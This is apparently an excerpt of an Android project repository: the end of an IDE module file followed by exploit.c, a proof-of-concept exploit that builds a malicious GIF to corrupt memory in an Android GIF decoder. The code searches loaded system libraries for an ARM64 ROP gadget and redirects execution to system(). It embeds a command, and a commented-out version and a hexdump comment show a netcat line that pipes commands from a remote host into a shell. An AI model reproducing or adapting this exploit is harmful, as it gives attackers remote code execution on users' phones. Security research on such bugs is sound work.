 70 |       <sourceFolder url="file://$MODULE_DIR$/src/testDebug/assets" type="java-test-resource" />
 71 |       <sourceFolder url="file://$MODULE_DIR$/src/testDebug/aidl" isTestSource="true" />
 72 |       <sourceFolder url="file://$MODULE_DIR$/src/testDebug/java" isTestSource="true" />
 73 |       <sourceFolder url="file://$MODULE_DIR$/src/testDebug/jni" isTestSource="true" />
 74 |       <sourceFolder url="file://$MODULE_DIR$/src/testDebug/rs" isTestSource="true" />
 75 |       <sourceFolder url="file://$MODULE_DIR$/src/testDebug/shaders" isTestSource="true" />
 76 |       <sourceFolder url="file://$MODULE_DIR$/src/main/res" type="java-resource" />
 77 |       <sourceFolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
 78 |       <sourceFolder url="file://$MODULE_DIR$/src/main/assets" type="java-resource" />
 79 |       <sourceFolder url="file://$MODULE_DIR$/src/main/aidl" isTestSource="false" />
 80 |       <sourceFolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
 81 |       <sourceFolder url="file://$MODULE_DIR$/src/main/jni" isTestSource="false" />
 82 |       <sourceFolder url="file://$MODULE_DIR$/src/main/rs" isTestSource="false" />
 83 |       <sourceFolder url="file://$MODULE_DIR$/src/main/shaders" isTestSource="false" />
 84 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/res" type="java-test-resource" />
 85 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/resources" type="java-test-resource" />
 86 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/assets" type="java-test-resource" />
 87 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/aidl" isTestSource="true" />
 88 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/java" isTestSource="true" />
 89 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/jni" isTestSource="true" />
 90 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/rs" isTestSource="true" />
 91 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTest/shaders" isTestSource="true" />
 92 |       <sourceFolder url="file://$MODULE_DIR$/src/test/res" type="java-test-resource" />
 93 |       <sourceFolder url="file://$MODULE_DIR$/src/test/resources" type="java-test-resource" />
 94 |       <sourceFolder url="file://$MODULE_DIR$/src/test/assets" type="java-test-resource" />
 95 |       <sourceFolder url="file://$MODULE_DIR$/src/test/aidl" isTestSource="true" />
 96 |       <sourceFolder url="file://$MODULE_DIR$/src/test/java" isTestSource="true" />
 97 |       <sourceFolder url="file://$MODULE_DIR$/src/test/jni" isTestSource="true" />
 98 |       <sourceFolder url="file://$MODULE_DIR$/src/test/rs" isTestSource="true" />
 99 |       <sourceFolder url="file://$MODULE_DIR$/src/test/shaders" isTestSource="true" />
100 |       <excludeFolder url="file://$MODULE_DIR$/.cxx" />
101 |       <excludeFolder url="file://$MODULE_DIR$/.externalNativeBuild" />
102 |       <excludeFolder url="file://$MODULE_DIR$/build" />
103 |     </content>
104 |     <orderEntry type="jdk" jdkName="Android API 28 Platform" jdkType="Android SDK" />
105 |     <orderEntry type="sourceFolder" forTests="false" />
106 |     <orderEntry type="library" scope="TEST" name="Gradle: junit:junit:4.12@jar" level="project" />
107 |     <orderEntry type="library" scope="TEST" name="Gradle: org.hamcrest:hamcrest-integration:1.3@jar" level="project" />
108 |     <orderEntry type="library" scope="TEST" name="Gradle: org.hamcrest:hamcrest-library:1.3@jar" level="project" />
109 |     <orderEntry type="library" scope="TEST" name="Gradle: org.hamcrest:hamcrest-core:1.3@jar" level="project" />
110 |     <orderEntry type="library" scope="TEST" name="Gradle: net.sf.kxml:kxml2:2.3.0@jar" level="project" />
111 |     <orderEntry type="library" scope="TEST" name="Gradle: com.squareup:javawriter:2.1.1@jar" level="project" />
112 |     <orderEntry type="library" scope="TEST" name="Gradle: javax.inject:javax.inject:1@jar" level="project" />
113 |     <orderEntry type="library" scope="TEST" name="Gradle: com.google.code.findbugs:jsr305:2.0.1@jar" level="project" />
114 |     <orderEntry type="library" scope="TEST" name="Gradle: com.android.support.test.espresso:espresso-core:3.0.2@aar" level="project" />
115 |     <orderEntry type="library" scope="TEST" name="Gradle: com.android.support.test:runner:1.0.2@aar" level="project" />
116 |     <orderEntry type="library" scope="TEST" name="Gradle: com.android.support.test:monitor:1.0.2@aar" level="project" />
117 |     <orderEntry type="library" scope="TEST" name="Gradle: com.android.support.test.espresso:espresso-idling-resource:3.0.2@aar" level="project" />
118 |     <orderEntry type="library" name="Gradle: com.android.support:collections:28.0.0-rc01@jar" level="project" />
119 |     <orderEntry type="library" name="Gradle: android.arch.lifecycle:common:1.1.1@jar" level="project" />
120 |     <orderEntry type="library" name="Gradle: android.arch.core:common:1.1.1@jar" level="project" />
121 |     <orderEntry type="library" name="Gradle: com.android.support:support-annotations:28.0.0-rc01@jar" level="project" />
122 |     <orderEntry type="library" name="Gradle: com.android.support.constraint:constraint-layout-solver:1.1.2@jar" level="project" />
123 |     <orderEntry type="library" name="Gradle: com.android.support:appcompat-v7:28.0.0-rc01@aar" level="project" />
124 |     <orderEntry type="library" name="Gradle: com.android.support:support-fragment:28.0.0-rc01@aar" level="project" />
125 |     <orderEntry type="library" name="Gradle: com.android.support:animated-vector-drawable:28.0.0-rc01@aar" level="project" />
126 |     <orderEntry type="library" name="Gradle: com.android.support:support-core-ui:28.0.0-rc01@aar" level="project" />
127 |     <orderEntry type="library" name="Gradle: com.android.support:support-core-utils:28.0.0-rc01@aar" level="project" />
128 |     <orderEntry type="library" name="Gradle: com.android.support:support-vector-drawable:28.0.0-rc01@aar" level="project" />
129 |     <orderEntry type="library" name="Gradle: com.android.support:loader:28.0.0-rc01@aar" level="project" />
130 |     <orderEntry type="library" name="Gradle: com.android.support:viewpager:28.0.0-rc01@aar" level="project" />
131 |     <orderEntry type="library" name="Gradle: com.android.support:coordinatorlayout:28.0.0-rc01@aar" level="project" />
132 |     <orderEntry type="library" name="Gradle: com.android.support:drawerlayout:28.0.0-rc01@aar" level="project" />
133 |     <orderEntry type="library" name="Gradle: com.android.support:slidingpanelayout:28.0.0-rc01@aar" level="project" />
134 |     <orderEntry type="library" name="Gradle: com.android.support:customview:28.0.0-rc01@aar" level="project" />
135 |     <orderEntry type="library" name="Gradle: com.android.support:swiperefreshlayout:28.0.0-rc01@aar" level="project" />
136 |     <orderEntry type="library" name="Gradle: com.android.support:asynclayoutinflater:28.0.0-rc01@aar" level="project" />
137 |     <orderEntry type="library" name="Gradle: com.android.support:support-compat:28.0.0-rc01@aar" level="project" />
138 |     <orderEntry type="library" name="Gradle: com.android.support:versionedparcelable:28.0.0-rc01@aar" level="project" />
139 |     <orderEntry type="library" name="Gradle: com.android.support:cursoradapter:28.0.0-rc01@aar" level="project" />
140 |     <orderEntry type="library" name="Gradle: android.arch.lifecycle:runtime:1.1.1@aar" level="project" />
141 |     <orderEntry type="library" name="Gradle: com.android.support:documentfile:28.0.0-rc01@aar" level="project" />
142 |     <orderEntry type="library" name="Gradle: com.android.support:localbroadcastmanager:28.0.0-rc01@aar" level="project" />
143 |     <orderEntry type="library" name="Gradle: com.android.support:print:28.0.0-rc01@aar" level="project" />
144 |     <orderEntry type="library" name="Gradle: android.arch.lifecycle:viewmodel:1.1.1@aar" level="project" />
145 |     <orderEntry type="library" name="Gradle: android.arch.lifecycle:livedata-core:1.1.1@aar" level="project" />
146 |     <orderEntry type="library" name="Gradle: android.arch.core:runtime:1.1.1@aar" level="project" />
147 |     <orderEntry type="library" name="Gradle: com.android.support:interpolator:28.0.0-rc01@aar" level="project" />
148 |     <orderEntry type="library" name="Gradle: com.android.support.constraint:constraint-layout:1.1.2@aar" level="project" />
149 |   </component>
150 | </module>


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/cpp/gif/exploit.c:
--------------------------------------------------------------------------------
  1 | #include "gif_lib.h"
  2 | #include <jni.h>
  3 | #include <string.h>
  4 | 
  5 | static jbyteArray NewJavaByteArray(JNIEnv* env, unsigned char *src, int size) {
  6 |     jbyteArray retVal = (*env)->NewByteArray(env, size);
  7 |     jbyte *buf = (*env)->GetByteArrayElements(env, retVal, NULL);
  8 |     memcpy(buf, src, size);
  9 |     (*env)->ReleaseByteArrayElements(env, retVal, buf, 0);
 10 |     return retVal;
 11 | }
 12 | 
 13 | #define ONE_BYTE_HEX_STRING_SIZE   3
 14 | static void get_hex(char *buf, int buf_len, char* hex_, int hex_len, int num_col) {
 15 |     int i;
 16 |     unsigned int byte_no = 0;
 17 |     if (buf_len <= 0) {
 18 |         if (hex_len > 0) {
 19 |             hex_[0] = '\0';
 20 |         }
 21 |         return;
 22 |     }
 23 |     if(hex_len < ONE_BYTE_HEX_STRING_SIZE + 1)
 24 |         return;
 25 |     do {
 26 |         for (i = 0; ((i < num_col) && (buf_len > 0) && (hex_len > 0)); ++i ) {
 27 |             snprintf(hex_, hex_len, "%02X ", buf[byte_no++] & 0xff);
 28 |             hex_ += ONE_BYTE_HEX_STRING_SIZE;
 29 |             hex_len -=ONE_BYTE_HEX_STRING_SIZE;
 30 |             buf_len--;
 31 |         }
 32 |         if (buf_len > 1) {
 33 |             snprintf(hex_, hex_len, "\n");
 34 |             hex_ += 1;
 35 |         }
 36 |     } while ((buf_len) > 0 && (hex_len > 0));
 37 | }
 38 | 
 39 | static size_t find_gadget(const char *libs[], int n, unsigned char *pattern, int size, int align) {
 40 |     FILE *fp;
 41 |     char path[1035];
 42 | 
 43 |     fp = fopen("/proc/self/maps", "r");
 44 |     if (fp == NULL) {
 45 |         LOGE("Unable to open /proc/self/maps");
 46 |         exit(0);
 47 |     }
 48 | 
 49 |     while (fgets(path, sizeof(path)-1, fp) != NULL) {
 50 |         for (int i = 0; i < n; i++) {
 51 |             if (strstr(path, libs[i])) {
 52 |                 if (strstr(path, "r-xp") || strstr(path, "rwxp")) {
 53 |                     size_t start, end;
 54 |                     sscanf(path, "%llx-%llx %*s", &start, &end);
 55 |                     size_t loc = 0;
 56 |                     while (start + size <= end) {
 57 |                         loc = memmem(start, end-start, pattern, size);
 58 |                         if (loc == 0)
 59 |                             break;
 60 |                         if (loc%align == 0) {
 61 |                             char hex_dump[5000];
 62 |                             get_hex(pattern, size, hex_dump, 5000, 16);
 63 |                             LOGE("gadget = %s size = %d found in \n%s", hex_dump, size, path);
 64 |                             return loc;
 65 |                         }
 66 |                         start = loc + 1;
 67 |                     }
 68 |                 }
 69 |             }
 70 |         }
 71 |     }
 72 |     return 0;
 73 | }
 74 | 
 75 | int genLine_0(unsigned char *buffer) {
 76 | /*
 77 |     00000000: 0000 0000 0000 0000 0000 0000 0000 0000  ................
 78 |     00000010: 0000 0000 0000 0000 4242 4242 4242 4242  ........BBBBBBBB
 79 |     00000020: 746f 7962 6f78 206e 6320 3139 322e 3136  toybox nc 192.16
 80 |     00000030: 382e 322e 3732 2034 3434 3420 7c20 7368  8.2.72 4444 | sh
 81 |     00000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
 82 |     00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
 83 |     00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
 84 |     00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
 85 |     00000080: 4141 4141 4141 4141 eeff                 AAAAAAAA..
 86 | 
 87 |     Over-write AAAAAAAA with address of gadget 1
 88 |     Over-write BBBBBBBB with address of system() function
 89 | 
 90 |     Gadget 1
 91 |     ldr x8, [x19, #0x18]
 92 |     add x0, x19, #0x20
 93 |     blr x8
 94 | */
 95 |     unsigned char hexData[138] = {
 96 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 97 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 98 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 99 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
100 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
101 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
102 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
103 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
104 |             0x00, 0x00, 0x00, 0x00, 0xEF, 0xBE, 0xAD, 0xDE, 0xEE, 0xFF
105 |     };
106 |     memcpy(buffer, hexData, sizeof(hexData));
107 | 
108 |     // find gadget 1
109 |     const char *libs[] = { "/system/framework/arm64/boot.oat", "/system/framework/arm64/boot-core-libart.oat", "/system/framework/arm64/boot-conscrypt.oat", "/system/framework/arm64/boot-okhttp.oat", "/system/framework/arm64/boot-bouncycastle.oat", "/system/framework/arm64/boot-apache-xml.oat", "/system/framework/arm64/boot-legacy-test.oat", "/system/framework/arm64/boot-ext.oat", "/system/framework/arm64/boot-framework.oat", "/system/framework/arm64/boot-telephony-common.oat", "/system/framework/arm64/boot-voip-common.oat", "/system/framework/arm64/boot-ims-common.oat", "/system/framework/arm64/boot-org.apache.http.legacy.boot.oat", "/system/framework/arm64/boot-android.hidl.base-V1.0-java.oat", "/system/framework/arm64/boot-android.hidl.manager-V1.0-java.oat", "/system/framework/arm64/boot-com.google.vr.platform.oat", "/system/bin/app_process64", "/system/lib64/libwebviewchromium_loader.so", "/system/lib64/libcompiler_rt.so", "/system/lib64/vndk-sp/libhidltransport.so", "/vendor/lib64/hw/android.hardware.graphics.mapper@2.0-impl.so", "/system/lib64/vndk-sp/libcutils.so", "/system/lib64/vndk-sp/libhidlbase.so", "/system/lib64/vndk-sp/libunwind.so", "/system/lib64/vndk-sp/android.hardware.graphics.mapper@2.0.so", "/system/lib64/vndk-sp/libbase.so", "/system/lib64/vndk-sp/libc++.so", "/system/lib64/vndk-sp/libhardware.so", "/system/lib64/vndk-sp/libbacktrace.so", "/system/lib64/vndk-sp/libhwbinder.so", "/system/lib64/vndk-sp/liblzma.so", "/system/lib64/vndk-sp/libutils.so", "/system/lib64/vndk-sp/android.hardware.graphics.common@1.0.so", "/system/lib64/libjavacrypto.so", "/system/lib64/libsoundpool.so", "/system/lib64/libvixl-arm.so", "/system/lib64/libvixl-arm64.so", "/system/lib64/libart-dexlayout.so", "/system/lib64/libart-compiler.so", "/system/lib64/libssl.so", "/system/lib64/libopenjdk.so", "/system/lib64/libopenjdkjvm.so", "/system/lib64/libjavacore.so", "/system/lib64/libwebviewchromium_plat_support.so", "/system/lib64/android.hardware.renderscript@1.0.so", "/system/lib64/libRS.so", "/system/lib64/libOpenSLES.so", "/system/lib64/libOpenMAXAL.so", "/system/lib64/android.hardware.neuralnetworks@1.0.so", "/system/lib64/libtextclassifier_hash.so", "/system/lib64/libneuralnetworks.so", "/system/lib64/libjnigraphics.so", "/system/lib64/libGLESv3.so", "/system/lib64/libmedia_jni.so", "/system/lib64/libmediandk.so", "/system/lib64/libmtp.so", "/system/lib64/libcamera2ndk.so", "/system/lib64/libmidi.so", "/system/lib64/libexif.so", "/system/lib64/libaaudio.so", "/system/lib64/libandroid.so", "/system/lib64/libtombstoned_client.so", "/system/lib64/liblz4.so", "/system/lib64/libart.so", "/system/lib64/libsigchain.so", "/system/lib64/libappfuse.so", "/system/lib64/android.hardware.cas@1.0.so", "/system/lib64/libhidlmemory.so", "/system/lib64/libvorbisidec.so", "/system/lib64/libui.so", "/system/lib64/libstagefright_foundation.so", "/system/lib64/libandroidfw.so", "/system/lib64/libmedia.so", "/system/lib64/libnativewindow.so", "/system/lib64/libcamera_client.so", "/system/lib64/libGLESv2.so", "/system/lib64/libpackagelistparser.so", "/system/lib64/libnativehelper.so", "/system/lib64/libgui.so", "/system/lib64/android.hidl.token@1.0-utils.so", "/system/lib64/libsonivox.so", "/system/lib64/libpowermanager.so", "/system/lib64/libmemunreachable.so", "/system/lib64/libdebuggerd_client.so", "/system/lib64/libnetd_client.so", "/system/lib64/libstagefright_http_support.so", "/system/lib64/libziparchive.so", "/system/lib64/libmediadrm.so", "/system/lib64/libprocessgroup.so", "/system/lib64/libutils.so", "/system/lib64/libminikin.so", "/system/lib64/libskia.so", "/system/lib64/libbacktrace.so", "/system/lib64/libandroid_runtime.so", "/system/lib64/libandroid_runtime.so", "/system/lib64/libc++.so", "/system/lib64/libc.so", "/system/lib64/libc.so", "/system/lib64/libc.so", "/system/lib64/libc.so", "/system/lib64/android.hardware.drm@1.0.so", "/system/lib64/libdl.so", "/system/lib64/libm.so", "/system/lib64/libpiex.so", "/system/lib64/libsqlite.so", "/system/lib64/android.hardware.media@1.0.so", "/system/lib64/libimg_utils.so", "/system/lib64/libunwind.so", "/system/lib64/libhwui.so", "/system/lib64/liblog.so", "/system/lib64/libgraphicsenv.so", "/system/lib64/libinput.so", "/system/lib64/libstagefright_flacdec.so", "/system/lib64/libEGL.so", "/system/lib64/libsensor.so", "/system/lib64/android.hardware.configstore-utils.so", "/system/lib64/libdng_sdk.so", "/system/lib64/android.hardware.graphics.common@1.0.so", "/system/lib64/libhidlbase.so", "/system/lib64/libstagefright.so", "/system/lib64/libjpeg.so", "/system/lib64/android.hardware.graphics.bufferqueue@1.0.so", "/system/lib64/libaudioutils.so", "/system/lib64/libGLESv1_CM.so", "/system/lib64/android.hardware.graphics.allocator@2.0.so", "/system/lib64/libvulkan.so", "/system/lib64/libprotobuf-cpp-lite.so", "/system/lib64/libharfbuzz_ng.so", "/system/lib64/libusbhost.so", "/system/lib64/libtinyxml2.so", "/system/lib64/libmemtrack.so", "/system/lib64/libvndksupport.so", "/system/lib64/libheif.so", "/system/lib64/android.hardware.memtrack@1.0.so", "/system/lib64/liblzma.so", "/system/lib64/libaudioclient.so", "/system/lib64/android.hidl.token@1.0.so", "/system/lib64/libstagefright_xmlparser.so", "/system/lib64/libnativeloader.so", "/system/lib64/libhwbinder.so", "/system/lib64/libicuuc.so", "/system/lib64/libnativebridge.so", "/system/lib64/libmedia_helper.so", "/system/lib64/libz.so", "/system/lib64/libmediametrics.so", "/system/lib64/libETC1.so", "/system/lib64/libstdc++.so", "/system/lib64/libpdfium.so", "/system/lib64/libvintf.so", "/system/lib64/libpcre2.so", "/system/lib64/libexpat.so", "/system/lib64/libcrypto.so", "/system/lib64/libhardware_legacy.so", "/system/lib64/libcamera_metadata.so", "/system/lib64/android.hardware.graphics.mapper@2.0.so", "/system/lib64/libcutils.so", "/system/lib64/libsync.so", "/system/lib64/libspeexresampler.so", "/system/lib64/libpng.so", "/system/lib64/libft2.so", "/system/lib64/android.hardware.cas.native@1.0.so", "/system/lib64/libsoundtrigger.so", "/system/lib64/libbinder.so", "/system/lib64/libaudiomanager.so", "/system/lib64/libhidltransport.so", "/system/lib64/android.hardware.media.omx@1.0.so", "/system/lib64/libmediautils.so", "/system/lib64/android.hidl.allocator@1.0.so", "/system/lib64/libwilhelm.so", "/system/lib64/libicui18n.so", "/system/lib64/libbase.so", "/system/lib64/libmedia_omx.so", "/system/lib64/android.hardware.configstore@1.0.so", "/system/lib64/libdrmframework.so", "/system/lib64/libselinux.so", "/system/lib64/libstagefright_omx_utils.so", "/system/lib64/libhardware.so", "/system/lib64/libRScpp.so", "/system/lib64/android.hidl.memory@1.0.so", "/system/lib64/libclang_rt.ubsan_standalone-aarch64-android.so" };
110 |     int n = sizeof(libs)/sizeof(char*);
111 |     unsigned char g1[12] = {
112 |             0x68, 0x0E, 0x40, 0xF9, // ldr x8, [x19, #0x18]
113 |             0x60, 0x82, 0x00, 0x91, // add x0, x19, #0x20
114 |             0x00, 0x01, 0x3F, 0xD6, // blr x8
115 |     };
116 |     size_t g1_loc = find_gadget(libs, n, g1, sizeof(g1), 4);
117 |     if (g1_loc == 0)
118 |         return 0;
119 | 
120 |     LOGE("g1_loc = %p", g1_loc);
121 |     memcpy(buffer + 128, &g1_loc, 8);
122 | 
123 |     size_t system_loc = &system;
124 |     LOGE("system_loc = %p", system_loc);
125 |     memcpy(buffer + 24, &system_loc, 8);
126 | 
127 | //    char *command = "toybox nc 192.168.2.72 4444 | sh";
128 |     char *command = "touch /sdcard/test.txt";
129 |     memcpy(buffer + 32, command, strlen(command));
130 | 
131 |     LOGE("== genLine_0 complete ==");
132 |     return sizeof(hexData);
133 | };
134 | 
135 | JNIEXPORT jbyteArray JNICALL Java_com_example_myapplication_MainActivity_generateGif(JNIEnv *env, jobject thiz) {
136 |     GifFilePrivateType Private = {
137 |             .Buf[0] = 0,
138 |             .BitsPerPixel = 8,
139 |             .ClearCode = 256,
140 |             .EOFCode = 257,
141 |             .RunningCode = 258,
142 |             .RunningBits = 9,
143 |             .MaxCode1 = 512,
144 |             .CrntCode = FIRST_CODE,
145 |             .CrntShiftState = 0,
146 |             .CrntShiftDWord = 0,
147 |             .PixelCount = 112,
148 |             .OutBuf = { 0 },
149 |             .OutBufLen = 0
150 |     };
151 | 
152 |     unsigned char buffer[1000] = { 0 };
153 |     int size = 0;
154 | 
155 |     unsigned char line[500] = { 0 };
156 | 
157 |     int line_size = genLine_0(line);
158 | 
159 |     EGifCompressLine(&Private, line, line_size);
160 | 
161 |     unsigned char starting[48] = {
162 |             0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x18, 0x00, 0x0A, 0x00, 0xF2, 0x00, 0x00, 0x66, 0xCC, 0xCC,
163 |             0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x33, 0x99, 0x66, 0x99, 0xFF, 0xCC, 0x00, 0x00, 0x00, 0x00,
164 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x15, 0x00, 0x00, 0x08
165 |     };
166 |     unsigned char padding[2] = { 0xFF, 0xFF };
167 |     unsigned char ending[61] = {
168 |             0x2C, 0x00, 0x00, 0x00, 0x00, 0x1C, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x00,
169 |             0x1C, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
170 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2C, 0x00,
171 |             0x00, 0x00, 0x00, 0x18, 0x00, 0x0A, 0x00, 0x0F, 0x00, 0x01, 0x00, 0x00, 0x3B
172 |     };
173 | 
174 |     // starting bytes
175 |     memcpy(buffer + size, starting, sizeof(starting));
176 |     size += sizeof(starting);
177 | 
178 |     // size of encoded line + padding
179 |     int tmp = Private.OutBufLen + sizeof(padding);
180 |     buffer[size++] = tmp;
181 | 
182 |     // encoded-line bytes
183 |     memcpy(buffer + size, Private.OutBuf, Private.OutBufLen);
184 |     size += Private.OutBufLen;
185 | 
186 |     // padding bytes of 0xFFs to trigger info->rewind(info);
187 |     memcpy(buffer + size, padding, sizeof(padding));
188 |     size += sizeof(padding);
189 | 
190 |     // ending bytes
191 |     memcpy(buffer + size, ending, sizeof(ending));
192 |     size += sizeof(ending);
193 | 
194 |     char hex_dump[5000];
195 |     get_hex(buffer, size, hex_dump, 5000, 16);
196 |     LOGE("buffer = %p size = %d\n%s", buffer, size, hex_dump);
197 | 
198 |     return NewJavaByteArray(env, buffer, size);
199 | }
200 | 


--------------------------------------------------------------------------------